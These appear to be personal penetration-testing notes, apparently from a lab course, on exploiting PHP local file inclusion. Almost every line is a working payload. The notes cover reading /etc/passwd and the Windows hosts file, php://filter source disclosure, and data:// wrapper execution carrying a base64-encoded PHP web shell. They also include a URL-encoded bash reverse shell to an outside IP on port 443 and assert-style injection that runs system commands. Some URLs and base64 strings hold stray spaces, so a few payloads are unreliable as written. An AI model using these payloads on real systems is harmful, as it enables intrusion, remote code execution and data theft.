File Inclusion Vuln

File inclusion Vuln

• Checking LFI on Windows server

  instead of /etc/passwd use C:/Windows/System32/drivers/etc/hosts

• PHP Wrappers

  PHP provides several protocol wrappers1 that we can use to exploit directory traversal and local file inclusion vulnerabilities. These filters give us additional flexibility when attempting to inject PHP code via LFI vulnerabilities.

  We can use the data2 wrapper to embed inline data as part of the URL with plaintext or base643 encoded data. This wrapper provides us with an alternative payload when we cannot poison a local file with PHP code.

  • filter to check source code of executable files

    • http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64- encode/resource=<file>

      • http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64- encode/resource=admin.php

        • then decode the output via echo “ “ | base64 -d

  • data:

    • <http://<vul-web>/menu.php?file=data:text/plain,<?php echo shell_exec("dir") ?>

    • if there any restriction then it can be bypass by encoding

      • echo -n '<?php echo system($_GET["cmd"]);?>' | base64

        • PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==

      • http://mountaindesserts.com/meteor/index.php?page=data://text/plain;base64,PD9waHAgZW NobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls"

    • Reverse shell http://<ip>/section.php?page=data:text/plain,<?php echo shell_exec('bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.119.221%2F443%200%3E%261');?>

• LFI through alternate way

  if ../../../etc/passwd don’t work then

  • ' and die(show_source('/etc/passwd')) or ‘

  • for command use shell

    • ' and die(system("<command>")) or ‘

  https://h0j3n.medium.com/vulnhub-assertion-1-0-1-eb78a0cb9216